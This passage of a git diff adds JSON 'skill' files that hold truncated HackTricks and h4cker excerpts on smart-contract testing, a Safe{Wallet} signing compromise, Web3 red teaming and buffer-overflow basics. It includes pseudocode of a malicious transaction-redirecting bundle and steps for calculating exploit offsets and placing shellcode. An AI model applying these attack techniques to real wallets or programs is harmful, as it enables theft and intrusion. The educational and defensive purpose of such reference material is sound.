+ "/workspaces/hunter-skill/hacktricks/src/blockchain/blockchain-and-crypto-currencies/defi-amm-virtual-balance-cache-exploitation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/blockchain_54691208a0ca.json b/skills/blockchain_54691208a0ca.json
new file mode 100644
index 0000000..6a49349
--- /dev/null
+++ b/skills/blockchain_54691208a0ca.json
@@ -0,0 +1,27 @@
+{
+ "id": "blockchain_54691208a0ca",
+ "category": "blockchain",
+ "title": "mutation testing with slither",
+ "description": "# Mutation Testing for Solidity with Slither (slither-mutate)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nMutation testing \"tests your tests\" by systematically introducing small changes (mutants) into your Solidity code and re-running your test suite. If a test fails, the mutant is killed. If the tests still pass, the mutant survives, revealing a blind spot in your test suite that line/branch coverage cannot detect.\n\nKey idea: Coverage shows code was executed; mutation testing shows whet",
+ "payloads": [
+ "# Mutation Testing for Solidity with Slither (slither-mutate)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Mutation testing \"tests your tests\" by systematically introducing small changes (mutants) into your Solidity code and re-running your test suite. If a test fails, the mutant is killed. If the tests still pass, the mutant survives, revealing a blind spot in your test suite that line/branch coverage cannot detect.",
+ "Key idea: Coverage shows code was executed; mutation testing shows whether behavior is actually asserted.",
+ "## Why coverage can deceive",
+ "Consider this simple threshold check:",
+ "```solidity",
+ "function verifyMinimumDeposit(uint256 deposit) public returns (bool) {",
+ "if (deposit >= 1 ether) {",
+ "return true;",
+ "} else {",
+ "return false;",
+ "Unit tests that only check a value below and a value above the threshold can reach 100% line/branch coverage while failing to assert the equality boundary (==). A refactor to `deposit >= 2 ether` would still pass such tests, silently breaking protocol logic.",
+ "Mutation testing exposes this gap by mutating the condition and verifying your tests fail.",
+ "## Common Solidity mutation operators"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/blockchain/smart-contract-security/mutation-testing-with-slither.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/blockchain_7c202020cc70.json b/skills/blockchain_7c202020cc70.json
new file mode 100644
index 0000000..f304a3f
--- /dev/null
+++ b/skills/blockchain_7c202020cc70.json
@@ -0,0 +1,27 @@
+{
+ "id": "blockchain_7c202020cc70",
+ "category": "blockchain",
+ "title": "web3 signing workflow compromise safe delegatecall proxy takeover",
+ "description": "# Web3 Signing Workflow Compromise & Safe Delegatecall Proxy Takeover\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nA cold-wallet theft chain combined a **supply-chain compromise of the Safe{Wallet} web UI** with an **on-chain delegatecall primitive that overwrote a proxy\u2019s implementation pointer (slot 0)**. The key takeaways are:\n\n- If a dApp can inject code into the signing path, it can make a signer produce a valid **EIP-712 signature over attacker-chosen fields** while res",
+ "payloads": [
+ "# Web3 Signing Workflow Compromise & Safe Delegatecall Proxy Takeover",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "A cold-wallet theft chain combined a **supply-chain compromise of the Safe{Wallet} web UI** with an **on-chain delegatecall primitive that overwrote a proxy\u2019s implementation pointer (slot 0)**. The key takeaways are:",
+ "- If a dApp can inject code into the signing path, it can make a signer produce a valid **EIP-712 signature over attacker-chosen fields** while restoring the original UI data so other signers remain unaware.",
+ "- Safe proxies store `masterCopy` (implementation) at **storage slot 0**. A delegatecall to a contract that writes to slot 0 effectively \u201cupgrades\u201d the Safe to attacker logic, yielding full control of the wallet.",
+ "## Off-chain: Targeted signing mutation in Safe{Wallet}",
+ "A tampered Safe bundle (`_app-*.js`) selectively attacked specific Safe + signer addresses. The injected logic executed right before the signing call:",
+ "```javascript",
+ "// Pseudocode of the malicious flow",
+ "orig = structuredClone(tx.data);",
+ "if (isVictimSafe && isVictimSigner && tx.data.operation === 0) {",
+ "tx.data.to = attackerContract;",
+ "tx.data.data = \"0xa9059cbb...\"; // ERC-20 transfer selector",
+ "tx.data.operation = 1; // delegatecall"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/blockchain/blockchain-and-crypto-currencies/web3-signing-workflow-compromise-safe-delegatecall-proxy-takeover.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/blockchain_c083c584bab9.json b/skills/blockchain_c083c584bab9.json
new file mode 100644
index 0000000..8a089f5
--- /dev/null
+++ b/skills/blockchain_c083c584bab9.json
@@ -0,0 +1,27 @@
+{
+ "id": "blockchain_c083c584bab9",
+ "category": "blockchain",
+ "title": "value centric web3 red teaming",
+ "description": "# Value-Centric Web3 Red Teaming (MITRE AADAPT)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThe MITRE Adversarial Actions in Digital Asset Payment Techniques (AADAPT) matrix captures attacker behaviors that manipulate digital value rather than just infrastructure. Treat it as a **threat-modeling backbone**: enumerate every component that can mint, price, authorize, or route assets, map those touchpoints to AADAPT techniques, and then drive red-team scenarios that measure whether the envi",
+ "payloads": [
+ "# Value-Centric Web3 Red Teaming (MITRE AADAPT)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "The MITRE Adversarial Actions in Digital Asset Payment Techniques (AADAPT) matrix captures attacker behaviors that manipulate digital value rather than just infrastructure. Treat it as a **threat-modeling backbone**: enumerate every component that can mint, price, authorize, or route assets, map those touchpoints to AADAPT techniques, and then drive red-team scenarios that measure whether the environment can resist irreversible economic loss.",
+ "## 1. Inventory value-bearing components",
+ "Build a map of everything that can influence value state, even if it is off-chain.",
+ "- **Custodial signing services** (HSM/KMS clusters, Vault/KMaaS, signing APIs used by bots or back-office jobs). Capture key IDs, policies, automation identities, and approval workflows.",
+ "- **Admin & upgrade paths** for contracts (proxy admins, governance timelocks, emergency pause keys, parameter registries). Include who/what can call them, and under which quorum or delay.",
+ "- **On-chain protocol logic** handling lending, AMMs, vaults, staking, bridges, or settlement rails. Document the invariants they assume (oracle prices, collateral ratios, rebalance cadence\u2026).",
+ "- **Off-chain automation** that builds transactions (market-making bots, CI/CD pipelines, cron jobs, serverless functions). These often hold API keys or service principals that can request signatures.",
+ "- **Oracles & data feeds** (aggregator composition, quorum, deviation thresholds, update cadence). Note every upstream relied on by automated risk logic.",
+ "- **Bridges and cross-chain routers** (lock/mint contracts, relayers, settlement jobs) tying chains or custodial stacks together.",
+ "Deliverable: a value-flow diagram showing how assets move, who authorizes movement, and which external signals influence business logic.",
+ "## 2. Map components to AADAPT behaviors",
+ "Translate the AADAPT taxonomy into concrete attack candidates per component.",
+ "| Component | Primary AADAPT focus |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/blockchain/blockchain-and-crypto-currencies/value-centric-web3-red-teaming.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_18c425828125.json b/skills/buffer_overflow_examples_18c425828125.json
new file mode 100644
index 0000000..b748b82
--- /dev/null
+++ b/skills/buffer_overflow_examples_18c425828125.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_18c425828125",
+ "category": "buffer-overflow-examples",
+ "title": "assembly basics",
+ "description": "# Learning Assembly for the Purpose of Principles of Reverse Engineering\n\nLearning assembly language, whether it's for x86 or ARM architectures, can be a complex task as it involves understanding the computer at a more fundamental level compared to high-level languages. Here are some important concepts and topics you should understand when learning assembly language:\n\n1. **Basic Computer Architecture**: Before starting with assembly, it's important to understand how computers work at a fundament",
+ "payloads": [
+ "# Learning Assembly for the Purpose of Principles of Reverse Engineering",
+ "Learning assembly language, whether it's for x86 or ARM architectures, can be a complex task as it involves understanding the computer at a more fundamental level compared to high-level languages. Here are some important concepts and topics you should understand when learning assembly language:",
+ "1. **Basic Computer Architecture**: Before starting with assembly, it's important to understand how computers work at a fundamental level. This includes concepts like memory management, CPU architecture, registers, and instruction cycle.",
+ "2. **Data Representation**: You should understand how data is represented in a computer system, including binary, hexadecimal, and two's complement for negative numbers. Knowing how data is represented will help you understand how different instructions manipulate this data.",
+ "3. **Instruction Set Architecture (ISA)**: Every architecture (like x86 and ARM) has its own ISA, which is a set of instructions that the CPU can execute. These include instructions for moving data, arithmetic operations, logical operations, control flow, and more.",
+ "4. **Registers**: Registers are small storage locations in the CPU that store data. Understanding the role of each register and how to use them is fundamental to assembly programming.",
+ "5. **Addressing Modes**: These are the methods used to access data in memory. Some common addressing modes include direct, indirect, register, immediate, and indexed addressing.",
+ "6. **Control Flow**: This includes concepts like loops, conditional branching (if-else statements), and function calls. Assembly has instructions for each of these, but they are often more complex to implement than in high-level languages.",
+ "7. **Stack**: The stack is a region of memory used for temporary storage of data. It's especially important for function calls and for saving the state of the program.",
+ "8. **Debugging and Tools**: Knowledge of tools for writing, assembling, linking, and debugging assembly programs is vital. This includes assemblers (like NASM for x86 and AS for ARM), linkers (like LD), and debuggers (like GDB).",
+ "For both x86 and ARM:",
+ "- **x86 Assembly**: x86 assembly can be written in either AT&T syntax or Intel syntax, which have some differences. x86 has a lot of legacy, which means there are many instructions, some of which do similar things. x86 architecture also includes different modes of operation, such as real mode, protected mode, and long mode (64-bit), each of which changes how the CPU interprets instructions.",
+ "- **ARM Assembly**: ARM uses a load-store architecture, which means that only specific instructions (load and store) can access memory. Most other instructions operate on registers. ARM also has a simpler, more orthogonal instruction set than x86. ARM processors also often include a Thumb instruction set, which uses 16-bit instructions instead of the standard 32-bit, for more compact code.",
+ "9. **Interrupts and Exception Handling**: Understanding how interrupts work, and how to handle exceptions at a low level, is a significant part of assembly programming.",
+ "10. **System Calls**: System calls are how a program interacts with the operating system. They can do things like read from a file, write to the console, allocate memory, and more. The specifics of how system calls are made are different on each operating system."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/basics/assembly-basics.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_1bfe10282a2f.json b/skills/buffer_overflow_examples_1bfe10282a2f.json
new file mode 100644
index 0000000..7e4e23e
--- /dev/null
+++ b/skills/buffer_overflow_examples_1bfe10282a2f.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_1bfe10282a2f",
+ "category": "buffer-overflow-examples",
+ "title": "secure coding",
+ "description": "# Secure Coding Practices to Prevent Buffer Overflows\n\n## Introduction\n\nBuffer overflows are preventable! While modern systems have multiple layers of defense, the most effective protection is writing secure code from the start. This guide provides practical, actionable techniques for preventing buffer overflows in C and C++ programs.\n\n## The Security-First Mindset\n\n### Core Principles\n\n1. **Never trust input** - All input is potentially malicious\n2. **Validate everything** - Check sizes, ranges",
+ "payloads": [
+ "# Secure Coding Practices to Prevent Buffer Overflows",
+ "## Introduction",
+ "Buffer overflows are preventable! While modern systems have multiple layers of defense, the most effective protection is writing secure code from the start. This guide provides practical, actionable techniques for preventing buffer overflows in C and C++ programs.",
+ "## The Security-First Mindset",
+ "### Core Principles",
+ "1. **Never trust input** - All input is potentially malicious",
+ "2. **Validate everything** - Check sizes, ranges, and formats",
+ "3. **Fail safely** - Handle errors explicitly",
+ "4. **Defense in depth** - Use multiple layers of protection",
+ "5. **Least privilege** - Run with minimum necessary permissions",
+ "### The Security Triangle",
+ "Security",
+ "/ \\",
+ "/ \\",
+ "Usability - Performance"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/defenses/secure-coding.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_2420f734c5c8.json b/skills/buffer_overflow_examples_2420f734c5c8.json
new file mode 100644
index 0000000..86da98d
--- /dev/null
+++ b/skills/buffer_overflow_examples_2420f734c5c8.json
@@ -0,0 +1,24 @@
+{
+ "id": "buffer_overflow_examples_2420f734c5c8",
+ "category": "buffer-overflow-examples",
+ "title": "mitigations",
+ "description": "# Mitigations for Buffer Overflows and Code Execution Prevention\n\nWhen running a program, compilers often create random values known as canaries, and place them on the stack after each buffer. Much like the coalmine birds for which they are named, these canary values flag danger. Checking the value of the canary against its original value can determine whether a buffer overflow has occurred. If the value has been modified, the program can be shut down or go into an error state rather than contin",
+ "payloads": [
+ "# Mitigations for Buffer Overflows and Code Execution Prevention",
+ "When running a program, compilers often create random values known as canaries, and place them on the stack after each buffer. Much like the coalmine birds for which they are named, these canary values flag danger. Checking the value of the canary against its original value can determine whether a buffer overflow has occurred. If the value has been modified, the program can be shut down or go into an error state rather than continuing to the potentially modified return address.",
+ "Additional defenses are provided by some of today\u2019s operating systems in the form of non-executable stacks and address space layout randomization (ASLR). Non-executable stacks (i.e., data execution prevention [DEP]) mark the stack and in some cases other structures as areas where code cannot be executed. This means that an attacker cannot inject exploit code onto the stack and expect it to successfully run.",
+ "ASLR was developed to defend against return oriented programming (a workaround to non-executable stacks where existing pieces of code are chained together based on the offsets of their addresses in memory). It works by randomizing the memory locations of structures so that their offsets are harder to determine. Had these defenses existed in the late 1980s, the Morris Worm may have been prevented. This is due to the fact that it functioned in part by filling a buffer in the UNIX fingerd protocol with exploit code, then overflowing that buffer to modify the return address to point to the buffer filled with exploit code. ASLR and DEP would have made it more difficult to pinpoint the address to point to, if not making that area of memory non-executable completely.",
+ "Sometimes a vulnerability slips through the cracks, remaining open to attack despite controls in place at the development, compiler, or operating system level. Sometimes, the first indication that a buffer overflow is present can be a successful exploitation. In this situation, there are two critical tasks to accomplish. First, the vulnerability needs to be identified, and the code base must be changed to resolve the issue. Second, the goal becomes to ensure that all vulnerable versions of the code are replaced by the new, patched version. Ideally this will start with an automatic update that reaches all Internet-connected systems running the software.",
+ "However, it cannot be assumed that such an update will provide sufficient coverage. Organizations or individuals may use the software on systems with limited access to the Internet. These cases require manual updates. This means that news of the update needs to be distributed to any admins who may be using the software, and the patch must be made easily available for download. Patch creation and distribution should occur as close to the discovery of the vulnerability as possible. Thus, minimizing the amount of time users and systems are vulnerable.",
+ "Through the use of safe buffer handling functions, and appropriate security features of the compiler and operating system, a solid defense against buffer overflows can be built. Even with these steps in place, consistent identification of these flaws is a crucial step to preventing an exploit. Combing through lines of source code looking for potential buffer overflows can be tedious. Additionally, there is always the possibility that human eyes may miss on occasion. Luckily, static analysis tools (similar to linters) that are used to enforce code quality have been developed specifically for the detection of security vulnerabilities during development.",
+ "## Additional References",
+ "- [Stack Canaries](https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/)",
+ "- [Address Space Layout Randomization](https://en.wikipedia.org/wiki/Address_space_layout_randomization)",
+ "- [Stack Smashing](https://en.wikipedia.org/wiki/Buffer_overflow_protection#GNU_Compiler_Collection_(GCC))",
+ "- [NX bit (no-execute)](https://en.wikipedia.org/wiki/NX_bit)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/defenses/mitigations.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_268aa68ea5f3.json b/skills/buffer_overflow_examples_268aa68ea5f3.json
new file mode 100644
index 0000000..16ed3c3
--- /dev/null
+++ b/skills/buffer_overflow_examples_268aa68ea5f3.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_268aa68ea5f3",
+ "category": "buffer-overflow-examples",
+ "title": "memory and stack",
+ "description": "# Memory and the Stack\n\n## Understanding Computer Memory\n\nTo understand buffer overflows, you need to understand how programs use memory. When a program runs, the operating system allocates memory to it, which is divided into several regions.\n\n## Memory Layout of a Process\n\nA typical process memory layout (from low to high addresses):\n\n```\nHigh Memory Address\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Kernel Space \u2502 \u2190 Operating system memory (off-limits)\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 Stack \u2502 \u2190 Local variables, ",
+ "payloads": [
+ "# Memory and the Stack",
+ "## Understanding Computer Memory",
+ "To understand buffer overflows, you need to understand how programs use memory. When a program runs, the operating system allocates memory to it, which is divided into several regions.",
+ "## Memory Layout of a Process",
+ "A typical process memory layout (from low to high addresses):",
+ "High Memory Address",
+ "\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510",
+ "\u2502 Kernel Space \u2502 \u2190 Operating system memory (off-limits)",
+ "\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524",
+ "\u2502 Stack \u2502 \u2190 Local variables, function calls (grows downward \u2b07)",
+ "\u2502 \u2b07 \u2502",
+ "\u2502 \u2502",
+ "\u2502 [free space] \u2502",
+ "\u2502 \u2502",
+ "\u2502 \u2b06 \u2502"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/basics/memory-and-stack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_31124554770e.json b/skills/buffer_overflow_examples_31124554770e.json
new file mode 100644
index 0000000..0120fcb
--- /dev/null
+++ b/skills/buffer_overflow_examples_31124554770e.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_31124554770e",
+ "category": "buffer-overflow-examples",
+ "title": "arm resources",
+ "description": "# ARM Architecture Resources\nThe following are a few good resources that can help you become familiar with the ARM architecure and exploitation of ARM-based vulnerabilities. \n\n\n## Tutorials and Articles\n* [ARM Assembly Basics Series](https://azeria-labs.com/writing-arm-assembly-part-1/) - Azeria\n* [ARM Binary Exploitation Series](https://azeria-labs.com/writing-arm-shellcode/) - Azeria\n* [Smashing the ARM Stack](https://www.merckedsecurity.com/blog/smashing-the-arm-stack-part-1) - Mercked Securi",
+ "payloads": [
+ "# ARM Architecture Resources",
+ "The following are a few good resources that can help you become familiar with the ARM architecure and exploitation of ARM-based vulnerabilities.",
+ "## Tutorials and Articles",
+ "* [ARM Assembly Basics Series](https://azeria-labs.com/writing-arm-assembly-part-1/) - Azeria",
+ "* [ARM Binary Exploitation Series](https://azeria-labs.com/writing-arm-shellcode/) - Azeria",
+ "* [Smashing the ARM Stack](https://www.merckedsecurity.com/blog/smashing-the-arm-stack-part-1) - Mercked Security",
+ "* [Introduction to ARMv8 64-bit Architecture](https://quequero.org/2014/04/introduction-to-arm-architecture/) - pnuic",
+ "* [Alphanumeric RISC ARM Shellcode](http://phrack.org/issues/66/12.html) - (Phrack) - Yves Younan, Pieter Philippaerts",
+ "* [Return-Oriented Programming on a Cortex-M Processor](https://ieeexplore.ieee.org/document/8029521)",
+ "* [3or ARM Exploitation Series](https://blog.3or.de/arm-exploitation-return-oriented-programming.html) - Dimitrios Slamaris",
+ "* [Developing StrongARM/Linux Shellcode](http://www.phrack.com/issues/58/10.html) - (Phrack) - funkysh",
+ "* [Reversing and Exploiting ARM Binaries](http://www.mathyvanhoef.com/2013/12/reversing-and-exploiting-arm-binaries.html) - Mathy Vanhoef",
+ "* [ARM Exploitation for IoT Series](https://quequero.org/2017/07/arm-exploitation-iot-episode-1/) - Andrea Sindoni",
+ "* [Reverse Engineering of ARM Microcontrollers](https://rdomanski.github.io/Reverse-engineering-of-ARM-Microcontrollers/) - Rdomanski",
+ "* [ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/resources/arm-resources.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_417edeb1d78c.json b/skills/buffer_overflow_examples_417edeb1d78c.json
new file mode 100644
index 0000000..d9a1376
--- /dev/null
+++ b/skills/buffer_overflow_examples_417edeb1d78c.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_417edeb1d78c",
+ "category": "buffer-overflow-examples",
+ "title": "memory safe languages",
+ "description": "# Memory-Safe Programming Languages: Recommendations to Combat Buffer Overflows\n\nBuffer overflows and other memory-related vulnerabilities have long plagued software development, especially in languages like C and C++ that require manual memory management. Recognizing the risks posed by these vulnerabilities, organizations such as the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and international cybersecurity bodies have strongly recommended transitio",
+ "payloads": [
+ "# Memory-Safe Programming Languages: Recommendations to Combat Buffer Overflows",
+ "Buffer overflows and other memory-related vulnerabilities have long plagued software development, especially in languages like C and C++ that require manual memory management. Recognizing the risks posed by these vulnerabilities, organizations such as the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and international cybersecurity bodies have strongly recommended transitioning to memory-safe programming languages. These languages are designed to mitigate common memory safety issues, such as buffer overflows, use-after-free errors, and dangling pointers.",
+ "## The Problem with Memory-Unsafe Languages",
+ "Languages like C and C++ offer low-level control over memory, which is essential for performance-critical applications. However, this flexibility comes at a cost: developers must manually manage memory allocation and deallocation, making it easy to introduce vulnerabilities. Common issues include:",
+ "- Buffer Overflows: Writing more data to a buffer than it can hold.",
+ "- Use-After-Free Errors: Accessing memory after it has been deallocated.",
+ "- Dangling Pointers: Pointers that reference invalid or deallocated memory.",
+ "These vulnerabilities are frequently exploited by attackers for remote code execution, data corruption, or system compromise. For example, Google reported that 70% of severe security bugs in its products stem from memory safety issues.",
+ "## Memory-Safe Programming Languages",
+ "Memory-safe languages are designed to prevent such vulnerabilities by incorporating features like automatic memory management, bounds checking, and strict type systems. Here are some of the most recommended options:",
+ "### 1. Rust",
+ "Rust is a standout choice for system-level programming due to its ownership model, which ensures memory safety at compile time without needing garbage collection. Its strict checks prevent common issues like buffer overflows and data races.",
+ "### 2. Go",
+ "Go offers garbage collection and a robust standard library that minimizes manual memory management errors. It avoids pitfalls like pointer arithmetic while maintaining high performance.",
+ "### 3. Java"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/defenses/memory-safe-languages.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_7088b789dbb6.json b/skills/buffer_overflow_examples_7088b789dbb6.json
new file mode 100644
index 0000000..abd7b05
--- /dev/null
+++ b/skills/buffer_overflow_examples_7088b789dbb6.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_7088b789dbb6",
+ "category": "buffer-overflow-examples",
+ "title": "tools",
+ "description": "# Recommended Tools for Buffer Overflow Research\n\n## Overview\n\nThis guide covers essential tools for buffer overflow research, exploitation, and defense. From debuggers to disassemblers, these tools will help you understand, analyze, and test binary vulnerabilities.\n\n## Debuggers\n\n### GDB (GNU Debugger)\n\n**The essential tool for Linux binary debugging.**\n\n**Installation:**\n```bash\n# Debian/Ubuntu\nsudo apt-get install gdb\n\n# Fedora/RHEL\nsudo dnf install gdb\n\n# Arch Linux\nsudo pacman -S gdb\n```\n\n*",
+ "payloads": [
+ "# Recommended Tools for Buffer Overflow Research",
+ "## Overview",
+ "This guide covers essential tools for buffer overflow research, exploitation, and defense. From debuggers to disassemblers, these tools will help you understand, analyze, and test binary vulnerabilities.",
+ "## Debuggers",
+ "### GDB (GNU Debugger)",
+ "**The essential tool for Linux binary debugging.**",
+ "**Installation:**",
+ "```bash",
+ "# Debian/Ubuntu",
+ "sudo apt-get install gdb",
+ "# Fedora/RHEL",
+ "sudo dnf install gdb",
+ "# Arch Linux",
+ "sudo pacman -S gdb",
+ "**Basic Usage:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/resources/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_9074b2f0c652.json b/skills/buffer_overflow_examples_9074b2f0c652.json
new file mode 100644
index 0000000..4bf3c12
--- /dev/null
+++ b/skills/buffer_overflow_examples_9074b2f0c652.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_9074b2f0c652",
+ "category": "buffer-overflow-examples",
+ "title": "calculating offsets",
+ "description": "# Calculating Offsets for Buffer Overflows\nWhen dealing with buffer overflows, one common objective is to locate precisely where in the input stream certain critical values (like return addresses, saved frame pointers, or function pointers) reside. To do this, you need to determine the offset within the payload at which those values occur. Here\u2019s the general process:\n\n1. **Identify the Vulnerable Input Point:** \n First, you need to confirm that the program accepts input (e.g., command line ar",
+ "payloads": [
+ "# Calculating Offsets for Buffer Overflows",
+ "When dealing with buffer overflows, one common objective is to locate precisely where in the input stream certain critical values (like return addresses, saved frame pointers, or function pointers) reside. To do this, you need to determine the offset within the payload at which those values occur. Here\u2019s the general process:",
+ "1. **Identify the Vulnerable Input Point:**",
+ "First, you need to confirm that the program accepts input (e.g., command line arguments, environment variables, network data, etc.) that can potentially be used to overflow a buffer.",
+ "2. **Pattern Generation:**",
+ "Instead of sending a long string of identical characters (e.g., all \"A\"s), you send a pattern of unique, non-repeating sequences. For instance, a string generated by tools like `pattern_create` (from the Metasploit Framework) or custom scripts. Such a pattern might look like `Aa0Aa1Aa2Aa3...` and so forth.",
+ "3. **Cause the Program to Crash:**",
+ "Run the program (often under a debugger) with this patterned input to cause the overflow. When it crashes, examine the registers (especially the instruction pointer or return address register).",
+ "4. **Identify the Offset in the Crash Data:**",
+ "The crash dump or debugger output will show a specific value from the pattern where, for example, the return address resides. By searching for this pattern substring in the original input pattern, you can find the exact position (offset) where control data (like the saved return address) was overwritten.",
+ "For instance, if `0x41334141` (the ASCII representation of part of the pattern) shows up in the return address register, you search the original pattern for that sequence and find it corresponds to an offset of, say, 260 bytes from the start of your input.",
+ "5. **Refine the Payload Based on the Offset:**",
+ "Once the offset is known, you can craft payloads that place specific shellcode or addresses precisely at the point required to control the program\u2019s execution flow.",
+ "**Why You Might Need to Send More Data than the Buffer Size**",
+ "Simply matching the buffer\u2019s declared size isn\u2019t usually enough when trying to exploit a buffer overflow. Here\u2019s why you might need to send more data:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/exploitation/calculating-offsets.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_a1ec03a1cc2f.json b/skills/buffer_overflow_examples_a1ec03a1cc2f.json
new file mode 100644
index 0000000..4f4b714
--- /dev/null
+++ b/skills/buffer_overflow_examples_a1ec03a1cc2f.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_a1ec03a1cc2f",
+ "category": "buffer-overflow-examples",
+ "title": "registers",
+ "description": "# CPU Registers Explained\n\n## Introduction\n\nRegisters are small, extremely fast storage locations built directly into the CPU. Understanding registers is essential for:\n- Reading and writing assembly code\n- Understanding buffer overflow exploitation\n- Debugging programs at the instruction level\n- Reverse engineering binaries\n\n## What are Registers?\n\n**Registers** are the CPU's working memory - tiny storage spaces that can hold data being actively processed. They are:\n- **Fastest memory** availab",
+ "payloads": [
+ "# CPU Registers Explained",
+ "## Introduction",
+ "Registers are small, extremely fast storage locations built directly into the CPU. Understanding registers is essential for:",
+ "- Reading and writing assembly code",
+ "- Understanding buffer overflow exploitation",
+ "- Debugging programs at the instruction level",
+ "- Reverse engineering binaries",
+ "## What are Registers?",
+ "**Registers** are the CPU's working memory - tiny storage spaces that can hold data being actively processed. They are:",
+ "- **Fastest memory** available (faster than cache, RAM, or disk)",
+ "- **Limited in number** (typically 8-16 general-purpose registers)",
+ "- **Architecture-specific** (different CPUs have different registers)",
+ "- **Directly accessible** by assembly instructions",
+ "### Why Registers Matter for Exploitation",
+ "In buffer overflow attacks:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/basics/registers.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_b2e1cf4dca20.json b/skills/buffer_overflow_examples_b2e1cf4dca20.json
new file mode 100644
index 0000000..e42d752
--- /dev/null
+++ b/skills/buffer_overflow_examples_b2e1cf4dca20.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_b2e1cf4dca20",
+ "category": "buffer-overflow-examples",
+ "title": "shellcode basics",
+ "description": "# Shellcode Basics\n\n## What is Shellcode?\n\n**Shellcode** is a small piece of machine code that is injected into a vulnerable program to execute arbitrary commands. The name comes from its original purpose: spawning a command shell. Today, shellcode can perform any action: download files, create backdoors, escalate privileges, or execute any code.\n\n### Key Characteristics\n\n1. **Position-Independent** - Runs regardless of memory location\n2. **Self-Contained** - No external dependencies\n3. **Compac",
+ "payloads": [
+ "# Shellcode Basics",
+ "## What is Shellcode?",
+ "**Shellcode** is a small piece of machine code that is injected into a vulnerable program to execute arbitrary commands. The name comes from its original purpose: spawning a command shell. Today, shellcode can perform any action: download files, create backdoors, escalate privileges, or execute any code.",
+ "### Key Characteristics",
+ "1. **Position-Independent** - Runs regardless of memory location",
+ "2. **Self-Contained** - No external dependencies",
+ "3. **Compact** - Small size to fit in limited buffers",
+ "4. **Avoids Bad Characters** - Works around input restrictions (null bytes, etc.)",
+ "## How Shellcode Works",
+ "### The Execution Flow",
+ "1. Vulnerability triggered (buffer overflow)",
+ "2. Shellcode injected into memory",
+ "3. Return address overwritten to point to shellcode",
+ "4. Program returns/jumps to shellcode location",
+ "5. Shellcode executes with program's privileges"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/buffer-overflow-examples/exploitation/shellcode-basics.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/buffer_overflow_examples_e1fbb0dfc34c.json b/skills/buffer_overflow_examples_e1fbb0dfc34c.json
new file mode 100644
index 0000000..9cb8185
--- /dev/null
+++ b/skills/buffer_overflow_examples_e1fbb0dfc34c.json
@@ -0,0 +1,27 @@
+{
+ "id": "buffer_overflow_examples_e1fbb0dfc34c",
+ "category": "buffer-overflow-examples",
